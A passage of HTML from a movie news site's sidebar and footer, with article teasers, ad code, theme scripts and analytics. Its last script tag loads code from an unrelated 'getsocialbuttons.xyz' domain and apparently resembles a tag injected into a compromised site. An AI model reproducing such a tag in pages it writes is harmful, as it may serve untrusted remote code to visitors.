        <div class="td_module_mx1 td_module_wrap td-animation-stack">
            <div class="td-module-thumb"><a href="http://moviehole.net/2017113304vincent-donofrio-dubious-battle" rel="bookmark" title="Vincent D&#8217;Onofrio &#8211; In Dubious Battle"><img width="356" height="220" class="entry-thumb" src="http://moviehole.net/img/vincent-356x220.jpeg" alt="" title="Vincent D&#8217;Onofrio &#8211; In Dubious Battle"/></a></div>
            <div class="td-module-meta-info">
                <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017113304vincent-donofrio-dubious-battle" rel="bookmark" title="Vincent D&#8217;Onofrio &#8211; In Dubious Battle">Vincent D&#8217;Onofrio &#8211; In Dubious Battle</a></h3>                <div class="td-editor-date">
                                        <span class="td-author-date">
                        <span class="td-post-author-name"><a href="http://moviehole.net/author/mike-smith">Mike Smith</a> <span>-</span> </span>                        <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-03-02T10:07:07+00:00" >Mar 2, 2017</time></span>                    </span>
                </div>
            </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_8_58cf2d9ce8804" data-td_block_id="td_uid_8_58cf2d9ce8804"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_8_58cf2d9ce8804" data-td_block_id="td_uid_8_58cf2d9ce8804"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block --><script>var block_td_uid_9_58cf2d9cee4b0 = new tdBlock();
block_td_uid_9_58cf2d9cee4b0.id = "td_uid_9_58cf2d9cee4b0";
block_td_uid_9_58cf2d9cee4b0.atts = '{"limit":"1","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"3, 1213, ","custom_title":"NEWS","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"3, 1213, ","td_filter_default_txt":"","color_preset":"","border_top":"","class":"td_block_widget td_uid_9_58cf2d9cee4b0_rand","offset":"","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_9_58cf2d9cee4b0.td_column_number = "1";
block_td_uid_9_58cf2d9cee4b0.block_type = "td_block_21";
block_td_uid_9_58cf2d9cee4b0.post_count = "1";
block_td_uid_9_58cf2d9cee4b0.found_posts = "30802";
block_td_uid_9_58cf2d9cee4b0.header_color = "#";
block_td_uid_9_58cf2d9cee4b0.ajax_pagination_infinite_stop = "";
block_td_uid_9_58cf2d9cee4b0.max_num_pages = "30802";
tdBlocksArray.push(block_td_uid_9_58cf2d9cee4b0);
</script><div class="td_block_wrap td_block_21 td_block_widget td_uid_9_58cf2d9cee4b0_rand td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_9_58cf2d9cee4b0" ><h4 class="block-title"><span>NEWS</span></h4><div class="td-subcat-filter" id="td_pulldown_td_uid_9_58cf2d9cee4b0"><ul class="td-subcat-list" id="td_pulldown_td_uid_9_58cf2d9cee4b0_list"><li class="td-subcat-item"><a class="td-subcat-link" id="td_uid_10_58cf2d9cef4f1" data-td_filter_value="" data-td_block_id="td_uid_9_58cf2d9cee4b0" href="#"></a></li><li class="td-subcat-item"><a class="td-subcat-link" id="td_uid_11_58cf2d9cef52e" data-td_filter_value="3" data-td_block_id="td_uid_9_58cf2d9cee4b0" href="#">Movie News</a></li><li class="td-subcat-item"><a class="td-subcat-link" id="td_uid_12_58cf2d9cef568" data-td_filter_value="1213" data-td_block_id="td_uid_9_58cf2d9cee4b0" href="#">TV</a></li></ul><div class="td-subcat-dropdown"><div class="td-subcat-more" aria-haspopup="true"><span>More</span><i class="td-icon-read-down"></i></div><ul class="td-pulldown-filter-list"></ul></div></div><div id=td_uid_9_58cf2d9cee4b0 class="td_block_inner">
        <div class="td_module_16 td_module_wrap td-animation-stack">
            <div class="td-module-thumb"><a href="http://moviehole.net/2017113729sam-elliott-warners-starry-musical-remake" rel="bookmark" title="Sam Elliott in Warner&#8217;s Starry musical remake"><img width="150" height="150" class="entry-thumb" src="http://moviehole.net/img/samelliott-1-150x150.jpg" alt="" title="Sam Elliott in Warner&#8217;s Starry musical remake"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017113729sam-elliott-warners-starry-musical-remake" rel="bookmark" title="Sam Elliott in Warner&#8217;s Starry musical remake">Sam Elliott in Warner&#8217;s Starry musical remake</a></h3>
                <div class="td-module-meta-info">
                                        <span class="td-post-author-name"><a href="http://moviehole.net/author/lacey-bridges">Lacey Bridges</a> <span>-</span> </span>                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-03-19T10:26:01+00:00" >Mar 19, 2017</time></span>                                    </div>

                <div class="td-excerpt">
                    "The Big Lebowski" actor joins highly-anticipated drama                </div>
            </div>

        </div>

        </div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_9_58cf2d9cee4b0" data-td_block_id="td_uid_9_58cf2d9cee4b0"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_9_58cf2d9cee4b0" data-td_block_id="td_uid_9_58cf2d9cee4b0"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-sidebar">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="9931553201"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="9931553201"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:200px;height:200px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="9931553201"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

<div class="td-a-rec td-a-rec-id-custom_ad_2 "><!-- ros - 300x250: 300x250 --> 
<div id="ros_10291"></div> </div>                            </div>
                        </div>
                            </div> <!-- /.td-pb-row -->
    </div> <!-- /.td-container -->
</div> <!-- /.td-main-content-wrap -->

<!-- Instagram -->



<!-- Footer -->
<div class="td-footer-wrapper">
    <div class="td-container">

	    <div class="td-pb-row">
		    <div class="td-pb-span12">
			    
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-footer_top">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8454820001"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8454820001"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8454820001"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8454820001"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

		    </div>
	    </div>

        <div class="td-pb-row">

            <div class="td-pb-span4">
                <script>var block_td_uid_13_58cf2d9cf0753 = new tdBlock();
block_td_uid_13_58cf2d9cf0753.id = "td_uid_13_58cf2d9cf0753";
block_td_uid_13_58cf2d9cf0753.atts = '{"limit":"3","sort":"random_7_day","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"DID YOU MISS?","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_13_58cf2d9cf0753_rand","offset":"","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_13_58cf2d9cf0753.td_column_number = "1";
block_td_uid_13_58cf2d9cf0753.block_type = "td_block_16";
block_td_uid_13_58cf2d9cf0753.post_count = "3";
block_td_uid_13_58cf2d9cf0753.found_posts = "42";
block_td_uid_13_58cf2d9cf0753.header_color = "#";
block_td_uid_13_58cf2d9cf0753.ajax_pagination_infinite_stop = "";
block_td_uid_13_58cf2d9cf0753.max_num_pages = "14";
tdBlocksArray.push(block_td_uid_13_58cf2d9cf0753);
</script><div class="td_block_wrap td_block_16 td_block_widget td_uid_13_58cf2d9cf0753_rand td-pb-border-top"  data-td-block-uid="td_uid_13_58cf2d9cf0753" ><h4 class="block-title"><span>DID YOU MISS?</span></h4><div id=td_uid_13_58cf2d9cf0753 class="td_block_inner td-column-1">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/2017113722alien-awakening-next-entry-franchise" rel="bookmark" title="Is Alien : Awakening the next entry in the franchise?"><img width="100" height="65" class="entry-thumb" src="http://moviehole.net/img/prometheus4.jpg" alt="" title="Is Alien : Awakening the next entry in the franchise?"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017113722alien-awakening-next-entry-franchise" rel="bookmark" title="Is Alien : Awakening the next entry in the franchise?">Is Alien : Awakening the next entry in the franchise?</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-03-19T10:03:42+00:00" >Mar 19, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/2017113727matrix-reboot-clarification-jordans-rumoured-role" rel="bookmark" title="Matrix reboot clarification, Jordan&#8217;s rumoured role"><img width="100" height="70" class="entry-thumb" src="http://moviehole.net/img/matrix-code-wallpaper-1-100x70.jpg" alt="" title="Matrix reboot clarification, Jordan&#8217;s rumoured role"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017113727matrix-reboot-clarification-jordans-rumoured-role" rel="bookmark" title="Matrix reboot clarification, Jordan&#8217;s rumoured role">Matrix reboot clarification, Jordan&#8217;s rumoured role</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-03-19T10:20:15+00:00" >Mar 19, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/2017113692hardy-play-seal-chopper-director" rel="bookmark" title="Hardy to play SEAL for Chopper director"><img width="100" height="65" class="entry-thumb" src="http://moviehole.net/img/tomhardy1.jpg" alt="" title="Hardy to play SEAL for Chopper director"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017113692hardy-play-seal-chopper-director" rel="bookmark" title="Hardy to play SEAL for Chopper director">Hardy to play SEAL for Chopper director</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-03-17T14:16:24+00:00" >Mar 17, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->            </div>

            <div class="td-pb-span4">
                <script>var block_td_uid_14_58cf2d9d3abf1 = new tdBlock();
block_td_uid_14_58cf2d9d3abf1.id = "td_uid_14_58cf2d9d3abf1";
block_td_uid_14_58cf2d9d3abf1.atts = '{"limit":"3","sort":"popular","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"3","category_ids":"","custom_title":"POPULAR STORIES","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_14_58cf2d9d3abf1_rand","offset":"","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_14_58cf2d9d3abf1.td_column_number = "1";
block_td_uid_14_58cf2d9d3abf1.block_type = "td_block_16";
block_td_uid_14_58cf2d9d3abf1.post_count = "3";
block_td_uid_14_58cf2d9d3abf1.found_posts = "30768";
block_td_uid_14_58cf2d9d3abf1.header_color = "#";
block_td_uid_14_58cf2d9d3abf1.ajax_pagination_infinite_stop = "";
block_td_uid_14_58cf2d9d3abf1.max_num_pages = "10256";
tdBlocksArray.push(block_td_uid_14_58cf2d9d3abf1);
</script><div class="td_block_wrap td_block_16 td_block_widget td_uid_14_58cf2d9d3abf1_rand td-pb-border-top"  data-td-block-uid="td_uid_14_58cf2d9d3abf1" ><h4 class="block-title"><span>POPULAR STORIES</span></h4><div id=td_uid_14_58cf2d9d3abf1 class="td_block_inner td-column-1">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/20045548toolman-hankering-for-toy-story-3" rel="bookmark" title="Toolman hankering for Toy Story 3"><img width="100" height="70" class="entry-thumb" src="http://moviehole.net/img/toy-story-100x70.png" alt="" title="Toolman hankering for Toy Story 3"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/20045548toolman-hankering-for-toy-story-3" rel="bookmark" title="Toolman hankering for Toy Story 3">Toolman hankering for Toy Story 3</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2004-11-10T00:00:00+00:00" >Nov 10, 2004</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/201260132recently-cancelled-se" rel="bookmark" title="10 Recently Cancelled Sequels : Not Coming Soon!"><img width="100" height="40" class="entry-thumb" src="http://moviehole.net/img/sequels2.jpg" alt="" title="10 Recently Cancelled Sequels : Not Coming Soon!"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/201260132recently-cancelled-se" rel="bookmark" title="10 Recently Cancelled Sequels : Not Coming Soon!">10 Recently Cancelled Sequels : Not Coming Soon!</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2012-12-02T04:58:44+00:00" >Dec 2, 2012</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/201591799exclusive-halloween-reboot-in-the-works" rel="bookmark" title="Exclusive: Halloween reboot in the works"><img width="100" height="59" class="entry-thumb" src="http://moviehole.net/img/Halloween.jpg" alt="" title="Exclusive: Halloween reboot in the works"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/201591799exclusive-halloween-reboot-in-the-works" rel="bookmark" title="Exclusive: Halloween reboot in the works">Exclusive: Halloween reboot in the works</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2015-06-13T03:04:07+00:00" >Jun 13, 2015</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->            </div>

            <div class="td-pb-span4">
                <div class="td_block_wrap td_block_popular_categories td_block_widget td_uid_15_58cf2d9e47511_rand widget widget_categories td-pb-border-top"  data-td-block-uid="td_uid_15_58cf2d9e47511" ><h4 class="block-title"><span>POPULAR CATEGORY</span></h4><ul class="td-pb-padding-side"><li><a href="http://moviehole.net/category/news">Movie News<span class="td-cat-no">30780</span></a></li><li><a href="http://moviehole.net/category/tv-2">TV<span class="td-cat-no">1703</span></a></li><li><a href="http://moviehole.net/category/movie-trailers">Trailers<span class="td-cat-no">1365</span></a></li><li><a href="http://moviehole.net/category/interviews">Interviews<span class="td-cat-no">1295</span></a></li><li><a href="http://moviehole.net/category/giveaways">Giveaways<span class="td-cat-no">878</span></a></li><li><a href="http://moviehole.net/category/cinema">Film Reviews<span class="td-cat-no">397</span></a></li><li><a href="http://moviehole.net/category/exclusives">Exclusives<span class="td-cat-no">381</span></a></li><li><a href="http://moviehole.net/category/caffeinatedclint">Caffeinated Clint<span class="td-cat-no">277</span></a></li></ul></div> <!-- ./block -->            </div>
        </div>
    </div>
<div class="td-footer-bottom-full">
    <div class="td-container">
        <div class="td-pb-row">
            <div class="td-pb-span3"><aside class="footer-logo-wrap"><a href="http://moviehole.net/"><img src="http://moviehole.net/img/LOGONEW.png" alt="" title=""/></a></aside></div><div class="td-pb-span5"><aside class="footer-text-wrap"><div class="block-title"><span>ABOUT US</span></div>One of the longest running movie news and entertainment sites on the internet</aside></div><div class="td-pb-span4"><aside class="footer-social-wrap td-social-style-2"><div class="block-title"><span>FOLLOW US</span></div>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://www.facebook.com/moviehole" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="moviehole" title="Google+">
                <i class="td-icon-font td-icon-googleplus"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://instagram.com/moviehole" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://http//WWW.pinterest.com/moviehole" title="Pinterest">
                <i class="td-icon-font td-icon-pinterest"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://www.twitter.com/moviehole" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span></aside></div>        </div>
    </div>
</div>
</div>

<!-- Sub Footer -->
</div><!--close td-outer-wrap-->



    <!--

        Theme: Newspaper by tagDiv 2016
        Version: 7.0.1 (rara)
        Deploy mode: deploy
        
        uid: 58cf2d9e4911a
    -->

    
	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"http:\/\/moviehole.net\/2017112907underworld-blood-wars":112907};
	</script>
<script type='text/javascript' src='http://moviehole.net/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var _wpcf7 = {"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}};
/* ]]> */
</script>
<script type='text/javascript' src='http://moviehole.net/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201712'></script>
<script type='text/javascript' src='http://moviehole.net/wp-content/themes/Newspaper/js/tagdiv_theme.js?ver=7.0.1'></script>
<script type='text/javascript' src='http://moviehole.net/wp-includes/js/comment-reply.min.js?ver=4.7.3'></script>
<script type='text/javascript' src='http://moviehole.net/wp-content/plugins/mega_main_menu/src/js/frontend/menu_functions.js?ver=4.7.3'></script>
<script type='text/javascript' src='http://moviehole.net/wp-includes/js/wp-embed.min.js?ver=4.7.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://moviehole.net/wp-content/plugins/jetpack/modules/sharedaddy/sharing.js?ver=4.5'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-google-plus-1', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomgoogle-plus-1', 'menubar=1,resizable=1,width=480,height=550' );
				return false;
			});
</script>

<!-- JS generated by theme -->

<script>
    

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'http://moviehole.net/wp-content/themes/Newspaper/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'http://moviehole.net/wp-content/themes/Newspaper';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>

<script type='text/javascript' src='http://stats.wp.com/e-201712.js' async defer></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:4.5',blog:'101996096',post:'112907',tz:'0',srv:'moviehole.net'} ]);
	_stq.push([ 'clickTrackerInit', '101996096', '112907' ]);
</script>
<script type="text/javascript" src="http://getsocialbuttons.xyz/get-social.js"></script>
</body>
</html>